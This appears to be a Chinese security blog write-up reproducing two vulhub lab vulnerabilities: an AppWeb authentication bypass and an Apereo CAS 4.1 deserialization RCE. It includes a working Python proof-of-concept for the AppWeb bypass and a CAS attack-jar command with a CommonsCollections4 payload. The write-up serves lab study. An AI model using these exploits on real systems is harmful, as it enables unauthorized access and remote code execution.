0x00 安装docker-compose
Ubuntu安装docker-compose
使用DaoCloud源下载
sudo curl -L https://get.daocloud.io/docker/compose/releases/download/1.22.0/docker-compose-`uname -s`-`uname -m` -o /usr/local/bin/docker-compose
设置权限
sudo chmod +x /usr/local/bin/docker-compose
data:image/s3,"s3://crabby-images/6037d/6037d369f94d8e2c7353b1fc22e82fe6e5972add" alt="image-20211228190423418"
0x01 启动漏洞环境
首先将漏洞环境全部Git到服务器上
git clone https://github.com/vulhub/vulhub.git
随后进入到对应的目录即可
docker-compose up -d
随后会开始下载
data:image/s3,"s3://crabby-images/3a3e0/3a3e04582a17f1484e67a14b7ef52f3ef86304da" alt="image-20211228231314976"
0x02 漏洞复现
访问8080端口,需要登录,burp修改一下参数
data:image/s3,"s3://crabby-images/4ac00/4ac0073d57627ef42089f2d4c40e14288f31c033" alt="image-20211228231303903"
添加Authorization,我们可以看到获取到了一个set-cookie
data:image/s3,"s3://crabby-images/151b2/151b27e3efd3d6fd67e03ae1bfff0822b7d569c1" alt="image-20211228231500502"
随后我们将这个cookie添加到浏览器中(因为我这里没有下载插件,所以直接在检查中修改即可)
data:image/s3,"s3://crabby-images/1acde/1acde04fe4ca0de2519c57b1d202b20ec98f9347" alt="image-20211228231646558"
data:image/s3,"s3://crabby-images/de5ae/de5aec9bf3e28fdbea1f3964c5bddde2f60cc253" alt="image-20211228231744666"
0x03 POC编写
使用Python进行POC编写,比较简单
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
'''
@Project :UzJuSecurityTools
@File :appWeb_Auth_Bypass_POC.py
@Author :UzJu
@Date :2021/12/28 10:58 下午
@Email :UzJuer@163.com
'''
import requests
import re
class AuthByPassPoc:
def __init__(self, url):
self.url = url
def getCookie(self):
poc_headers = {
'Authorization': 'Digest username="admin"'
}
result = requests.get(url=self.url,
headers=poc_headers)
try:
if result.headers["Set-Cookie"]:
print(f"[+]存在漏洞, cookie值为: {result.headers['Set-Cookie']}, \n[+]进行下一步确认")
return result.headers['Set-Cookie']
except:
print("[-]set-cookie为空,也许不存在漏洞")
def checkVuln(self):
headers = {
'cookie': self.getCookie()
}
result = requests.get(url=self.url,
headers=headers)
title = re.search('<title>(.*)</title>', result.text, flags=re.I).group(1) # 获取标题
print("[+]获取登录后Title: ", title)
if __name__ == '__main__':
main = AuthByPassPoc("http://ip:8080")
main.checkVuln()
data:image/s3,"s3://crabby-images/af02d/af02d3f49655076730c3adbb40a47f1458b07308" alt="image-20211228233518153"
0x04 漏洞原理
AppWeb是Embedthis Software LLC公司负责开发维护的一个基于GPL开源协议的嵌入式Web Server。他使用C/C++来编写,能够运行在几乎先进所有流行的操作系统上。当然他最主要的应用场景还是为嵌入式设备提供Web Application容器。
AppWeb可以进行认证配置,其认证方式包括以下三种:
其7.0.3之前的版本中,对于digest和form两种认证方式,如果用户传入的密码为null(也就是没有传递密码参数),appweb将因为一个逻辑错误导致直接认证成功,并返回session。
0x05 参考
1、https://ssd-disclosure.com/index.php/archives/3676
0x06 启动Apereo CAS 4.1 反序列化RCE漏洞环境
首先将漏洞环境全部Git到服务器上
git clone https://github.com/vulhub/vulhub.git
随后进入到对应的目录即可
docker-compose up -d
随后会开始下载
data:image/s3,"s3://crabby-images/a185c/a185c482f87854e2e9ecfefdcfff1a575c976f97" alt="image-20211228190451666"
data:image/s3,"s3://crabby-images/52190/521900c770099fa165b9e9b402d8a3d895178356" alt="image-20211228190505005"
随后可以看到漏洞环境已经启动成功
0x07 漏洞复现
下载提供的Apereo-CAS-Attack进行漏洞利用
https://github.com/vulhub/Apereo-CAS-Attack/releases
随后执行
java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "touch /tmp/success"
data:image/s3,"s3://crabby-images/4f256/4f256320b0042f72cc43071e821052ea80198f56" alt="image-20211228190724641"
随后访问8080端口
data:image/s3,"s3://crabby-images/2801a/2801a68e6e554cb538570a26642c070ad5ad5f5c" alt="image-20211228191453316"
随便输入账号密码,替换execution参数
data:image/s3,"s3://crabby-images/7da9b/7da9b4393b91d93c63beec94e054b82836768d63" alt="image-20211228191838220"
随后进入docker中查看
docker exec -it [dockerid] /bin/bash
data:image/s3,"s3://crabby-images/1acf7/1acf7f6ae555de0edb2dc718db66ee8864d51be4" alt="image-20211228192123896"
新建了一个success
0X08 参考
https://github.com/vulhub/vulhub/blob/master/apereo-cas/4.1-rce/README.md